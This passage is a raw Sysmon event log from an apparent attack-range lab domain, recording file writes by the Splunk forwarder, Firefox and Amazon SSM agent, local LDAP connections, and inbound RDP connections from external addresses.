23542300x80000000000000001047534Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:07.867{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F1C9B6BE3C5E934408DC352B84B5ECD,SHA256=F57871557DA996981DC1246C9CF8F111D3F39A1C71AEDC5EE2B43417540BDC2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976004Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:07.311{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E0781A4739216AC555F765B411CC589,SHA256=C46C4974D8AD37227B368708D2FD1AE20F1B806A8C7F19CAAF8DAE778ABF27E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976003Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:03.402{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50650-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001047536Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:08.914{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0E703AFEA2A05EA585A428FC6F5F58,SHA256=345F5D9C2A43210B12581C0B8B04773160FD2EBDE0A7767AF8210C40A114E5FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976007Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:08.311{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C828AC339764BB6D5D19F6635BE5E57,SHA256=EFD97F7FD29D501DE24304466A7B67741C8B9B6FF12F4DD369CDF16354DEF33F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047535Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:06.837{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49190-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000976006Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:05.089{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-5823-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976005Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:04.876{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59232-false10.0.1.12-8000- 23542300x80000000000000001047539Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:09.928{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E311ADD4C87393F84AE04EC70B4FA76,SHA256=C284E786BDD12B79A35F94ED764DCD692F31A993A40FF706FB2696662D109503,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976009Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:09.311{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=556502AB8C04ED3C7584275E2E119674,SHA256=7C8E89B968F9BDA9EC9BADF13CE5EF40865D02E7A38B8D64B1890C158A717A19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047538Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:09.697{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9144A2551EB9F632CC5F192AF737FFD9,SHA256=A3E6D0CA8DFB88D44BE4115E3572C3661412D507CE1CA0B09D91894C34D1E9EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047537Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:09.697{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15AB9AE7E9EDECE0203E1007DA545EAA,SHA256=6ED4B6C613D614C891928AD87E85BC82A9588CF99FD15834EBF980D8B567EF52,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976008Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:06.241{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65213-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001047540Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:10.947{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADC43EACCE9D8AD964E21638B00F2A97,SHA256=F0E0853DE7315C7C1860C5840612BA316F199E10B201A5C7819DA27F0B6B89DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976012Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:10.389{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=077D0CF98CF9C5A396D428FD942ABBF8,SHA256=39EC5E6A70A101056C47333083F416746F5D2F88875BBAEE8F5A922045C43A7E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976011Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:07.086{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49280-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976010Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:10.045{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A994F91692A06932242412AF48753E3,SHA256=907E065A3EA9DF3296F838BADC1FC4BCB2D7E6F1C2DC91C6C52658D5A1730C7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976014Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:11.639{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=491AE56D8E44AA64F30F37DF80585235,SHA256=BF28D62F829453D030EA8B7A6475E93DA560C92825E0645825CB46476F6E9F44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047549Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:11.983{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2158511CF0EEF0ABC8278181FB8F4C5,SHA256=C1AF886A5EB049FC621925C3B9CAF8CED8DC2B4176B9C5E180FAB17334A6FD04,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047548Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:09.460{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50118-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047547Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:11.499{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=1CEFD230FC28688A0563451D6D9BDC0C,SHA256=D2350E840995F854E6F93A905231E74111C3B5EF65BE0C1D7FEF3A70E9136C4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047546Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:11.499{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=38773BA2AFB0063479B322D8ABEFA959,SHA256=C1E4FFD29D9CF3FCAD801209D669371C3712B13FC7F2EB78FD5522EF72772114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047545Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:11.499{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=75FBA73D30CB01CD0935AD11BF016B6A,SHA256=F5453DE7322AD3550119C95250C3760EA2F5472F909029ABB4063F465D6CB041,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047544Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:11.499{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=8A0A093FC365DEF032B5D76749498AA2,SHA256=AABA43E3699731B171D2534DE2C790BC3108EBEC52427BD728CE65BBBDF6E524,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047543Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:11.499{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=22423C860C488BDC74B1D8F66E23CAB7,SHA256=080EF4CA12D1D8CD0191ADCE62141192F3433B4020DC75A33038AF3506F8C84B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047542Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:11.499{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=09558F87F5C3FB4E37FAB61E04E532F6,SHA256=033FAD5A242BB0A896EC4F71BB7D6390D66DC89B96143430DECC1F7105437E0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047541Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:11.400{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9144A2551EB9F632CC5F192AF737FFD9,SHA256=A3E6D0CA8DFB88D44BE4115E3572C3661412D507CE1CA0B09D91894C34D1E9EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976013Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:08.305{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-55884-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976015Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:12.717{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C94A239EE9E7CC597665884D50141068,SHA256=238C8320A956858CF08753F8A0355C1583FAEB3EC85D0B2FC8717684D622475F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047550Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:12.335{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4295MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976019Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:13.748{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1A2EDA80294AD691DDF595C3C7C7BA2,SHA256=7AC67CC75C0CC63636898A949D85A06C5A0A6EF7278B338DF94E3333541824D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047552Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:13.333{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4296MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047551Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:13.032{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44105EED7C7FBF31783E49E210587731,SHA256=0E7B38C8DEDACB5EEF1E5A4991B16638C6021E8D15876F171E38E74723EAA0E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976018Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:13.405{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976017Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:10.205{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-35801-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976016Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:09.892{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59233-false10.0.1.12-8000- 23542300x8000000000000000976020Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:14.764{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AC20C54A1AF9BAEAAA3BD1200238F52,SHA256=1EFF99F0EDC238A5D1BC13B34DF8100914B7F3C867AF9E83AC63D91B18839ED3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047554Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:12.740{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49191-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047553Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:14.050{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52ECE3FBB24274BABC3244FADD6272B7,SHA256=822BA63B6D418BD52C732AF0792197E9CC5FB2EFD77CC83E3FE2A3222D1181CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976024Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:15.983{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F59D12B2B1DE7789C5F4A47B70174A2,SHA256=1604ABED58F6A4FA2E5F8775C7527B0F0A75D74BA884D533FCFEA101802DA3A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976023Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:12.034{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59234-false10.0.1.12-8089- 23542300x8000000000000000976022Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:15.326{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DC3C4561157F58565552C38485F39FF,SHA256=93331ABD678669303772AADF34EA27B650AEC83B1A1ED5E1D55C28510BBB8037,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976021Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:15.326{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D694FC6EA0D7619269D747379F99BBFE,SHA256=A29A83629C9B126FC53B21E166765E4C4B0CACB2E9BCEDC94AC81BF0343567DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047555Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:15.069{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3F865EBBB942F59115B95E3D55D88F1,SHA256=776B169CB7120AC2031268B99E5E13B3D6A9AFCB2AA94247EFF7D574C22096A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047556Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:16.084{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E47CD6AB90CCF57AFA74FB95397A24E9,SHA256=24C8B4F3DCAE484CBEE6636443886E21EF98278E78038210E250C736A12929F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047561Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:15.907{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49192-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001047560Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:15.907{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49192-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001047559Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:17.315{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C0003D9371F54CE5797CE085DBA740,SHA256=04A7F5980227B3E5BC5BFEECDCF33F40CB70D46D520E9A63F9A4767F98216603,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976027Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:14.381{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-6668-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976026Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:17.451{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DC3C4561157F58565552C38485F39FF,SHA256=93331ABD678669303772AADF34EA27B650AEC83B1A1ED5E1D55C28510BBB8037,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976025Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:17.092{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=687A414FEBB790E4F4E31078746B37E4,SHA256=75D808D2844D5C7D6D4D41BA3558FDA9379420A649BD4435F9E8FC3F1F0C2DE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047558Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:17.252{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3E0A3A55EC5E63943EA9B8FF16E1F19,SHA256=CB9A8846B684F9040F76364960E3B58906B7CB99E55EC19FF10A9BD250324D29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047557Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:17.252{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D435D015DF503AA03A29FDB67B88CA21,SHA256=2B1A47DB431475575816A19497835189B8457A71943ACAB423B0D7912E0B011A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976029Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:15.738{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59235-false10.0.1.12-8000- 23542300x8000000000000000976028Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:18.217{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B94C5F91A2D0FCA869B1E40F6AD82D59,SHA256=9FC85EB29ED93F26AE38EC6DC7976F2526E0817078791B7AF5A67C8D7CCFFA18,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047563Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:16.559{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54645-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047562Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:18.352{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 